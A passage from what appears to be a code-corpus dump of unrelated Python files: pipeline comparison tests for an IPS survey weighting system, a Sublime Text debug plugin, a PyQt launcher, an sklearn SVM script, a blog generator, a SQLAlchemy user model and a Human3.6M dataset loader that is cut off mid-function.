                                                             downcast='float')
    expected_results.index = range(0, len(expected_results))
    # Debug dumps for manual inspection of mismatches.
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_survey_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_survey_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]["ps_table"], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(actual_results['UNSAMP_REGION_GRP_PV'],
                                                           errors='coerce',
                                                           downcast='float')
    actual_results = actual_results.sort_values(
        ['UNSAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'UNSAMP_REGION_GRP_PV', 'CASES', 'SUM_PRIOR_WT', 'SUM_UNSAMP_TRAFFIC_WT',
         'UNSAMP_TRAFFIC_WT'])
    actual_results.index = range(0, len(actual_results))
    expected_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(expected_results['UNSAMP_REGION_GRP_PV'],
                                                             errors='coerce',
                                                             downcast='float')
    expected_results['RUN_ID'] = RUN_ID
    # Expected CSV uses lower-case column names for these measures.
    expected_results = expected_results.sort_values(
        ['UNSAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'UNSAMP_REGION_GRP_PV', 'cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
         'unsamp_traffic_wt'])
    expected_results[['cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
                      'unsamp_traffic_wt']] = expected_results[['cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
                                                                'unsamp_traffic_wt']].round(3)
    expected_results.index = range(0, len(expected_results))
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_summary_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_summary_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False, check_like=True)
@pytest.mark.xfail
def test_imbalance_weight_step():
    """Run the imbalance-weight step and compare its survey and summary output
    against the expected CSV baselines (marked xfail: known mismatch)."""
    # Assign variables
    conn = database_connection()
    step_name = "IMBALANCE_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Imbalance Weight step
    ips.steps.imbalance_weight.imbalance_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    # Get results of Survey Data and compare
    sql = """
    SELECT {}
    FROM {}
    WHERE RUN_ID = '{}'
    AND [SERIAL] not like '9999%'
    AND [RESPNSE] between 1 and 6
    """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dumps for manual inspection of mismatches.
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_survey_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_survey_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(['FLOW', 'SUM_PRIOR_WT', 'SUM_IMBAL_WT'])
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(['FLOW', 'SUM_PRIOR_WT', 'SUM_IMBAL_WT'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results.index = range(0, len(expected_results))
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_summary_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_summary_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_final_weight_step():
    """Run the final-weight step and compare its survey and summary output
    against the expected CSV baselines (marked xfail: known mismatch)."""
    # Assign variables
    conn = database_connection()
    step_name = "FINAL_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Final Weight step
    ips.steps.final_weight.final_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    # Get results of Survey Data and compare
    sql = """
    SELECT {}
    FROM {}
    WHERE RUN_ID = '{}'
    AND SERIAL not like '9999%'
    AND RESPNSE between 1 and 6
    """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dumps for manual inspection of mismatches.
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_survey_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_survey_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(
        ['SERIAL', 'SHIFT_WT', 'NON_RESPONSE_WT', 'MINS_WT', 'TRAFFIC_WT', 'UNSAMP_TRAFFIC_WT', 'IMBAL_WT', 'FINAL_WT'])
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(
        ['SERIAL', 'SHIFT_WT', 'NON_RESPONSE_WT', 'MINS_WT', 'TRAFFIC_WT', 'UNSAMP_TRAFFIC_WT', 'IMBAL_WT', 'FINAL_WT'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results.index = range(0, len(expected_results))
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_summary_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_summary_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_stay_imputation_step():
    """End-to-end check of the stay imputation step against the baseline CSV."""
    conn = database_connection()
    # Locate the expected-results CSV for this step.
    expected_csv = os.path.join(TEST_DATA_DIR, "stay_imputation", SURVEY_DATA_FILENAME)
    # Execute the step under test.
    ips.steps.stay_imputation.stay_imputation_step(RUN_ID, conn)
    # Pull back the survey columns the step is expected to have populated.
    columns = "[SERIAL], " + " , ".join(STEP_CONFIGURATION["STAY_IMPUTATION"]['nullify_pvs'])
    db_frame = cf.select_data(columns, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    baseline = pd.read_csv(expected_csv, engine='python')
    # Normalise both frames so they can be compared row-for-row.
    db_frame = db_frame.dropna(subset=['STAY_IMP_FLAG_PV'])
    actual = db_frame.sort_values('SERIAL')
    actual.replace('None', np.nan, inplace=True)
    actual.index = range(0, len(actual))
    baseline = baseline.sort_values('SERIAL')
    baseline.index = range(0, len(baseline))
    assert_frame_equal(actual, baseline, check_dtype=False)
def test_fares_imputation_step():
    """Run the fares imputation step and compare surveyed columns with the
    Python-generated baseline CSV (SAS baseline unusable: OPERA_PV is random)."""
    # Assign variables
    conn = database_connection()
    step_name = 'FARES_IMPUTATION'
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    # Run Fares Imputation step
    ips.steps.fares_imputation.fares_imputation_step(RUN_ID, conn)
    # Build the column list from the step's nullify_pvs configuration
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    # Get results of Survey Data and compare
    sql = """
        SELECT {}
        FROM {}
        WHERE RUN_ID = '{}'
        AND SERIAL not like '9999%'
        AND RESPNSE between 1 and 6
        """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    # Using comparison data populated by Python from unit test due
    # to random values populated in OPERA_PV. NOT USING SAS BASELINE DATA
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: align sort order and reset indexes for the diff
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dump for manual inspection of mismatches
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\fares_survey_actual.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_spend_imputation_step():
    """Run the spend imputation step and compare against an expected frame
    assembled from the SAS spend output plus the fares step's SPEND values."""
    # Assign variables
    conn = database_connection()
    # Run Spend Imputation step
    ips.steps.spend_imputation.spend_imputation_step(RUN_ID, conn)
    # Only eligible records are imputed, hence the SPEND_IMP_ELIGIBLE_PV filter
    sql = """
        SELECT [SERIAL], [SPENDK], [SPEND] as 'newspend'
        FROM {}
        WHERE RUN_ID = '{}'
        AND [SERIAL] not like '9999%'
        AND [RESPNSE] between '1' and '6'
        AND [SPEND_IMP_ELIGIBLE_PV] = '1'
        """.format(idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    # Merge results from Fares in to SAS comparison data to create expected dataset
    fares_output = pd.read_csv(TEST_DATA_DIR + r'\fares_imputation\surveydata_out_expected.csv',
                               engine='python')
    sas_spend_output = pd.read_csv(TEST_DATA_DIR + r'\spend_imputation\surveydata_out_expected.csv',
                                   engine='python')
    fares_output = fares_output[['SERIAL', 'SPEND']].copy()
    fares_output.sort_values(by='SERIAL', inplace=True)
    fares_output.index = range(0, len(fares_output))
    sas_spend_output = sas_spend_output[['SERIAL', 'SPENDK', 'newspend']].copy()
    sas_spend_output.sort_values(by='SERIAL', inplace=True)
    sas_spend_output.index = range(0, len(sas_spend_output))
    expected_results = pd.merge(sas_spend_output, fares_output, on='SERIAL', how='left')
    # Where the SAS output imputed nothing, fall back to the fares SPEND value
    expected_results.loc[(np.isnan(expected_results['newspend'])), 'newspend'] = expected_results['SPEND']
    expected_results.drop(columns='SPEND', inplace=True)
    # Formatting and fudgery: align sort order and reset indexes for the diff
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dump for manual inspection of mismatches
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\spend_survey_actual.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_rail_imputation_step():
    """Run the rail imputation step and compare SPEND against the baseline CSV."""
    # Assign variables
    conn = database_connection()
    step_name = 'RAIL_IMPUTATION'
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    # Run Rail Imputation step
    ips.steps.rail_imputation.rail_imputation_step(RUN_ID, conn)
    # Get results of Survey Data and compare.  (A nullify_pvs column list was
    # previously built here but never used — the query selects SERIAL and
    # SPEND explicitly — so that dead code has been removed.)
    sql = """
        SELECT SERIAL, SPEND
        FROM {}
        WHERE RUN_ID = '{}'
        AND [SERIAL] not like '9999%'
        AND [RESPNSE] between 1 and 6
        """.format(idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: align sort order and reset indexes for the diff
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dump for manual inspection of mismatches
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\rail_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\rail_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_regional_weights_step():
    """Run the regional weights step and compare the stay/visit/expenditure
    weight columns for eligible records against the baseline CSV."""
    # Assign variables
    conn = database_connection()
    step_name = 'REGIONAL_WEIGHTS'
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    # Run Regional Weights step
    ips.steps.regional_weights.regional_weights_step(RUN_ID, conn)
    # Column list is hard-coded rather than taken from nullify_pvs (the
    # commented lines below show the configuration-driven alternative)
    # sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    # sql_cols = "[SERIAL], " + sql_cols
    sql_cols = '[SERIAL], [NIGHTS1], [NIGHTS2], [NIGHTS3], [NIGHTS4], [NIGHTS5], [NIGHTS6], [NIGHTS7], [NIGHTS8], [EXPENDITURE_WT], [EXPENDITURE_WTK], [STAY1K], [STAY2K], [STAY3K], [STAY4K], [STAY5K], [STAY6K], [STAY7K], [STAY8K], [STAY_WT], [STAY_WTK], [VISIT_WT], [VISIT_WTK]'
    sql = """
        SELECT {}
        FROM {}
        WHERE RUN_ID = '{}'
        AND [SERIAL] not like '9999%'
        AND [RESPNSE] between 1 and 6
        AND [REG_IMP_ELIGIBLE_PV] = 1
        """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: align sort order and reset indexes for the diff
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dump for manual inspection of mismatches
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\regional_actual.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_town_stay_expenditure_imputation_step():
    """Run the town & stay expenditure imputation step and compare the
    SPEND1..SPEND8 columns for eligible records against the baseline CSV."""
    # Assign variables
    conn = database_connection()
    step_name = 'TOWN_AND_STAY_EXPENDITURE'
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    # Run Town & Stay Expenditure Imputation step
    ips.steps.town_stay_expenditure.town_stay_expenditure_imputation_step(RUN_ID, conn)
    # Column list is hard-coded rather than taken from nullify_pvs (the
    # commented lines below show the configuration-driven alternative)
    # sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    # sql_cols = "[SERIAL], " + sql_cols
    sql_cols = '[SERIAL], [SPEND1], [SPEND2], [SPEND3], [SPEND4], [SPEND5], [SPEND6], [SPEND7], [SPEND8]'
    # Get results of Survey Data and compare
    sql = """
        SELECT {}
        FROM {}
        WHERE RUN_ID = '{}'
        AND [SERIAL] not like '9999%'
        AND [RESPNSE] between 1 and 6
        AND [TOWN_IMP_ELIGIBLE_PV] = 1
        """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: align sort order and reset indexes for the diff
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    # Debug dump for manual inspection of mismatches
    actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\town_stay_actual.csv')
    expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\town_stay_expected.csv')
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_airmiles_step():
    """Run the air-miles step and diff its survey output against the baseline."""
    conn = database_connection()
    baseline_csv = os.path.join(TEST_DATA_DIR, "air_miles", SURVEY_DATA_FILENAME)
    # Execute the step under test.
    ips.steps.air_miles.airmiles_step(RUN_ID, conn)
    # Fetch the columns this step populates, keyed by run id.
    columns = "[SERIAL], " + " , ".join(STEP_CONFIGURATION["AIR_MILES"]['nullify_pvs'])
    actual = cf.select_data(columns, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    expected = pd.read_csv(baseline_csv, engine='python')
    # Normalise ordering and indexing so the frames compare row-for-row.
    actual = actual.sort_values('SERIAL')
    actual.replace('None', np.nan, inplace=True)
    actual.index = range(0, len(actual))
    expected = expected.sort_values('SERIAL')
    expected.index = range(0, len(expected))
    assert_frame_equal(actual, expected, check_dtype=False)
|
996,609 | 2631daeb2b4b44426fcfef5fd4c472595a0e6618 | import sublime
import sublime_plugin
def plugin_loaded():
    """Sublime entry point: sync input/command/regex logging with the
    user's 'debug' preference when the plugin is loaded."""
    value = get_setting()
    # Trailing semicolons removed — not idiomatic Python.
    sublime.log_input(value)
    sublime.log_commands(value)
    sublime.log_result_regex(value)
def get_setting():
    """Return the user's 'debug' preference, defaulting to False when unset."""
    preferences = sublime.load_settings("Preferences.sublime-settings")
    # Settings.get accepts a default, replacing the manual None check.
    return preferences.get("debug", False)
|
996,610 | bc78a599175873a1e017b783adec333ee360d9ad | #!/usr/bin/python3
# -*- coding: utf-8 -*-
'''
Created by Tan.Xing
Created date: 2019/01/03
Last edited: 2019/01/03
'''
import sys
from PyQt5.QtWidgets import QApplication
from UI.UiController import windowController
from Widget.SafeCloseWindow import SafeCloseMainWindow
if __name__ == '__main__':
    app = QApplication(sys.argv)
    # SafeCloseMainWindow guards window closing; the controller wires up the UI.
    mainWindow = SafeCloseMainWindow()
    main = windowController(mainWindow)
    mainWindow.setFixedSize(1036, 660)
    mainWindow.show()
    # Hand control to the Qt event loop and exit with its return code.
    # (A dead `pass` that followed sys.exit() — unreachable — was removed.)
    sys.exit(app.exec_())
996,611 | 1f78f469b32e45726326cb95b14d4a383c5e5d68 | # Imports
from sklearn import svm
import sklearn.cross_validation as cv
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from sklearn.cross_validation import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import csv
import numpy as np
#Useful load function
loadData = lambda txt: np.genfromtxt(open(txt,'r'), delimiter = ',')
#Data class created for easier manipulation of the training, labels and test data
#Data class created for easier manipulation of the training, labels and test data
class Data(object):
    """Container for the training features/labels and the test set.

    After do_grid_search() the fitted GridSearchCV object is kept on
    self.classifier.
    """

    def __init__(self, features, labels, test):
        self.features = features
        self.labels = labels
        self.test = test

    def do_grid_search(self, C_range, g_range, score, k):
        """Tune an RBF-kernel SVM over C_range x g_range with stratified CV.

        `score` selects the GridSearchCV scoring metric; `k` is the number
        of stratified folds.  Stores the fitted search on self.classifier.
        """
        tuned_parameters = [{'kernel': ['rbf'], 'gamma': g_range,
                             'C': C_range}]
        # Fix: the fold count was hard-coded to k=3, silently ignoring the
        # `k` argument passed by the caller.
        cvk = StratifiedKFold(self.labels, k=k)
        # print statements converted to the parenthesized form so the file
        # parses under both Python 2 and 3 (rest of the file already does).
        print(cvk)
        print("# Tuning hyper-parameters for %s" % score)
        # Conducts a gridsearch over the defined parameters and selects the
        # parameters that score best under the chosen metric.
        self.classifier = GridSearchCV(svm.SVC(), tuned_parameters, cv=cvk, scoring=score)
        self.classifier.fit(self.features, self.labels)
        print("Best parameters set found on development set:")
        print(self.classifier.best_estimator_)
        # Grid scores are stored on the fitted classifier as grid_scores_.
        print("Grid scores on development set:")
        for params, mean_score, scores in self.classifier.grid_scores_:
            print("%0.3f (+/-%0.03f) for %r" % (mean_score, scores.std() / 2, params))

    #def semisupervised_boost():

    def pca_transform(self, n_components, whiten_bool):
        """Fit PCA on the training features and project both train and test."""
        pca = PCA(n_components, whiten_bool)
        self.features = pca.fit_transform(self.features)
        self.test = pca.transform(self.test)

    def estimate_score(self, k):
        """Print a k-fold cross-validated score estimate for the best model."""
        scores = cv.cross_val_score(self.classifier.best_estimator_, self.features, self.labels, cv=k)
        print('Estimated score: %0.5f (+/- %0.5f)' % (scores.mean(), scores.std() / 2))
#Main script
if __name__ == '__main__':
    # Loading csv files
    trainFeatures = loadData('train.csv')
    trainLabels = loadData('trainLabels.csv')
    testFeatures = loadData('test.csv')
    # Create instance of Data class
    data = Data(trainFeatures, trainLabels, testFeatures)
    # Estimator parameter grid search ranges
    C_range = [1, 100, 1000, 10000, 100000, 1000000]
    g_range = [0.0001, 0.001, 0.01, 0.1, 0.2, 0.27777778, 0.3]
    # Score for parameter evaluation, also possible: f1, precision, accuracy, recall...
    score = 'accuracy'
    # K folds for cross validation of score evaluation
    k = 5
    # Methods and data manipulation
    data.pca_transform(n_components=12, whiten_bool=True)
    data.do_grid_search(C_range, g_range, score, k)
    data.estimate_score(k=60)
    # Write results file in the form specified under the competition details.
    # Best classifier obtained from the grid search is used; a context manager
    # guarantees the file is closed even if prediction/writing fails.
    results = data.classifier.best_estimator_.predict(data.test)
    with open('results.csv', 'w') as resultsFile:
        resultsFile.write('Id,Solution\n')
        # Ids are 1-based row numbers.
        for count, label in enumerate(results, start=1):
            resultsFile.write('%d,%d\n' % (count, label))
|
996,612 | 6b4486f2001da41dff99e9e480f214c0fe61a093 | import os
import menu
import post
import sml
import template
def get_posts(posts_src_dir):
    """Yield a parsed post object for every '*.post' file in posts_src_dir."""
    for entry in os.listdir(posts_src_dir):
        if entry.endswith('.post'):
            yield post.from_file(os.path.join(posts_src_dir, entry))
def generate(posts_src_dir, posts_target_dir):
    """Render every published post to HTML and yield its public link.

    Posts are ordered newest-first.  Each rendered page receives traversal
    links to its oldest/previous/next/newest neighbours; the neighbour is
    None (no link) where the post is itself the oldest or newest.
    """
    post_list = get_posts(posts_src_dir)
    # Only published posts are rendered (identity comparison for None).
    post_list = list(filter(lambda p: p.published is not None, post_list))
    post_list = list(sorted(
        post_list,
        key = lambda p: p.published,
        reverse = True,
    ))
    if len(post_list) > 0:
        newest_post = post_list[0]
        oldest_post = post_list[-1]
    else:
        newest_post = None
        oldest_post = None
    # Per-post neighbour lists, aligned index-for-index with post_list.
    oldest_post_list = ([oldest_post] * (len(post_list) - 1)) + [None]
    previous_post_list = post_list[1:] + [None]
    next_post_list = [None] + post_list[:-1]
    newest_post_list = [None] + ([newest_post] * (len(post_list) - 1))
    zipped = zip(
        oldest_post_list,
        previous_post_list,
        post_list,
        next_post_list,
        newest_post_list,
    )
    for oldest_post, previous_post, current_post, next_post, newest_post in zipped:
        post_target_path = os.path.join(posts_target_dir, current_post.link_filename)
        traversal_links = post.get_traversal_links(
            oldest_post,
            previous_post,
            next_post,
            newest_post,
        )
        with open(post_target_path, 'w') as f:
            f.write(template.apply_base_template(
                current_post.title,
                current_post.authors,
                current_post.keywords,
                current_post.description,
                post.to_html(current_post, menu.MENU, traversal_links),
            ))
        yield post.filename_to_link(current_post.link_filename, current_post)
|
996,613 | 02ea7223d5ff84b3b3235ab27789f18d8af1d73e | from sqlalchemy import Boolean, Column, Integer, String, Enum
from database import Base
from schemas import Role
class User(Base):
    """SQLAlchemy ORM model for an application user account."""

    __tablename__ = "users"

    # Surrogate primary key.
    id = Column(Integer, primary_key=True, index=True)
    email = Column(String, unique=True, index=True)
    username = Column(String, unique=True, index=True)
    full_name = Column(String)
    # Hash of the user's password (field name implies hashing happens elsewhere).
    hashed_password = Column(String)
    # Per-user secret — presumably for TOTP one-time codes; confirm with the auth code.
    otp_secret = Column(String)
    # Soft-disable flag; new accounts start enabled.
    disabled = Column(Boolean, default=False)
    # Authorisation role, constrained to the Role enum imported from schemas.
    role = Column(Enum(Role))
|
996,614 | 827b0f9551ae9bd2244b0c77a29222f0030d7122 | import os, sys
import pickle
import random
import numpy as np
from PIL import Image
import torch
from torch.utils.data import *
from . import skeleton # import skeleton
from .dataset_utils import * # from dataset_utils import *
class Human36m(Dataset):
    """Human3.6M frame dataset yielding RGB crops plus rendered skeletons.

    Each __getitem__ call returns `return_count - 1` source frame/skeleton
    pairs and one target pair from the same video, advancing an internal
    per-video cursor so successive calls walk through the video's frames.
    """

    def __init__(self, root_dir, modality, return_count, image_size, normalize, shuffle, sample_count,
                 keypoint_size=5, skeleton_width=2, extend_ratio=0.2, random_flip=False, random_crop=False):
        """Args:
            root_dir: directory containing one sub-directory per video, each
                with its frames and a 'metadata.pkl'.
            modality: 'skeleton_2d' or 'skeleton_rgbd'.
            return_count: frames returned per item (including the target).
            image_size: side length of the square output crops.
            normalize: forwarded to the tensor conversion helpers.
            shuffle: shuffle the frame order within each video.
            sample_count: optional fixed-size random subsample per video.
            keypoint_size, skeleton_width: skeleton rendering parameters.
            extend_ratio: how far the crop box may grow beyond the bbox.
            random_flip: enable random horizontal flip augmentation.
            random_crop: enable randomised crop-box extension.
        """
        super(Human36m, self).__init__()
        self.root_dir = root_dir
        self.modality = modality
        self.return_count = return_count
        self.image_size = image_size
        self.normalize = normalize
        self.shuffle = shuffle
        self.sample_count = sample_count
        self.keypoint_size = keypoint_size
        self.skeleton_width = skeleton_width
        self.extend_ratio = extend_ratio
        self.random_flip = random_flip
        self.random_crop = random_crop
        # Rendering parameters are passed to the skeleton module as globals.
        skeleton.keypoint_size = keypoint_size
        skeleton.skeleton_width = skeleton_width
        # load the list of all videos (one sub-directory per video)
        self.all_videos = os.listdir(root_dir)
        self.video_count = len(self.all_videos)
        # current sample pos for each video
        self.pos = [0 for _ in range(self.video_count)]
        self.all_metadata = list()
        for video in self.all_videos:
            with open(os.path.join(root_dir, video, 'metadata.pkl'), 'rb') as f_in:
                metadata = pickle.load(f_in)
            if not shuffle or sample_count is not None:
                # fixed by the same seed so subsampling/ordering is
                # reproducible; the RNG state is restored afterwards
                old_state = random.getstate()
                random.seed(0)
                if sample_count is not None:
                    metadata = random.sample(metadata, sample_count)
                else:
                    random.shuffle(metadata)
                random.setstate(old_state)
            if shuffle:
                random.shuffle(metadata)
            self.all_metadata.append(metadata)

    def __len__(self):
        # One "item" per video; frames are paged through via self.pos.
        return self.video_count

    def __getitem__(self, item):
        """Return (item, images, skeletons, image_t, skeleton_t) for video `item`."""
        video = self.all_videos[item]
        metadata = self.all_metadata[item]
        image_count = len(metadata)
        # consumes frames self.pos[item] .. self.pos[item] + return_count - 1
        if self.pos[item] + self.return_count > image_count:
            # reached the end of this video: reset (and optionally reshuffle)
            self.pos[item] = 0
            if self.shuffle:
                random.shuffle(metadata)
        images = list()
        skeletons = list()
        # read images
        for i in range(self.return_count):
            idx = self.pos[item] + i
            file_name, bbox, keypoints_img, depth = metadata[idx]
            img_fullname = os.path.join(self.root_dir, video, file_name)
            img = Image.open(img_fullname).convert('RGB')
            w, h = img.size
            # get base box
            x1, y1, x2, y2 = bbox
            # extend the box to square
            x1, y1, x2, y2, side = extend_box_to_square(x1, y1, x2, y2, w, h)
            # space left on four sides
            left = x1
            right = w - x2
            up = y1
            down = h - y2
            if self.random_crop:
                # randomly distribute the extension between the four sides,
                # limited by the available margin and extend_ratio
                max_extend = min(left + right, up + down)
                max_extend = min(max_extend, side * self.extend_ratio)
                extend = random.uniform(0, max_extend)
                extend_left = random.uniform(max(0, extend - right), min(left, extend))
                extend_right = extend - extend_left
                extend_up = random.uniform(max(0, extend - down), min(up, extend))
                extend_down = extend - extend_up
                new_x1 = x1 - extend_left
                new_y1 = y1 - extend_up
                new_x2 = x2 + extend_right
                new_y2 = y2 + extend_down
            else:
                # symmetric extension
                extend_ratio = self.extend_ratio / 2  # for one side
                extend = min(left, right, up, down)
                extend = min(extend, side * extend_ratio)
                new_x1 = x1 - extend
                new_y1 = y1 - extend
                new_x2 = x2 + extend
                new_y2 = y2 + extend
            # express keypoints in crop coordinates
            keypoints_img_new = keypoints_img.copy()
            keypoints_img_new[:, 0] -= new_x1
            keypoints_img_new[:, 1] -= new_y1
            # crop the image
            cropped_img = img.crop((new_x1, new_y1, new_x2, new_y2))
            new_w, new_h = cropped_img.size
            # Random horizontal flip.  Fix: the random_flip flag was stored
            # but never consulted, so flipping happened 50% of the time even
            # when augmentation was disabled.
            if self.random_flip and random.random() >= 0.5:
                flip = True
                cropped_img = cropped_img.transpose(Image.FLIP_LEFT_RIGHT)
                keypoints_img_new[:, 0] = new_w - 1 - keypoints_img_new[:, 0]
            else:
                flip = False
            # resize to the square output size
            ratio_w = self.image_size / new_w
            ratio_h = self.image_size / new_h
            output_size = (self.image_size, self.image_size)
            cropped_img = cropped_img.resize(output_size, Image.LANCZOS)
            # convert to tensor
            images.append(to_tensor(cropped_img, self.normalize))
            # rescale keypoints to the resized crop and render the skeleton
            keypoints_img_new[:, 0] *= ratio_w
            keypoints_img_new[:, 1] *= ratio_h
